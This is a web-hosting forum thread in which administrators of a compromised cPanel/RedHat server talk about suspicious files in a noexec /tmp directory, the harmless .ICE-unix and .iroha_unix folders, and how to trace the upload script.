I've read through the following two articles and aside from disabling my compilers, I basically follow most of what they've written to the letter:
Improving System Security On CPanel Systems
How To: Secure your new RedHat Server

I've also installed Blue|Fusion's Linux Security Script and haven't had much in the way of problems on our servers in a while. I am curious about two things though. I'm pretty sure that there's a script somewhere on the server that's allowing someone to upload their apps onto /tmp (thankfully, noexec) but I've been unable to find it by checking for the offending files in the httpd logs of the various sites on the server. Any hints as to what I should be looking for?

I've also noticed that for some reason, the attacker always creates directories for ".iroha_unix" and ".ICE-unix" in /tmp so I was wondering how is this possible if /tmp is already set to noexec?

Also found the following when I ran netstat -dl:


Any suggestions on where I could read more about solving these issues?

Hi Bork,

/tmp/.ICE-unix and /tmp/.ihora_unix are supposed to be there. I don't know off hand what they're for, but every system I used (even local desktops) had those directories. These are not hack attempts and should be left alone.

All programs should be able to write to /tmp (hence permissions are 1777), however with "noexec" option, it prevents uploaded scripts from being executed in /tmp.

Thanks for the info Blue|Fusion. Just that I noticed that whenever the system would slow down (load jumping up to 50), I'd find those two folders there. My Google search results for iroha and ICE lead me to a bunch of Japanese sites, so I'm guessing they're used for the Canna server or something?

Any suggestions with regards tracking down which script is allowing uploads of potentially malicious code? I usually see a bunch of files named "apache" and "httpd" in /tmp. (which they thankfully can't execute )

files named apache and httpd should not be in /tmp, atleast from what I've seen (mostly with cPanel servers). Those two folders could be from the canna server. I never really looked into it. If you don't need the cannaserver, stop the service and try it out.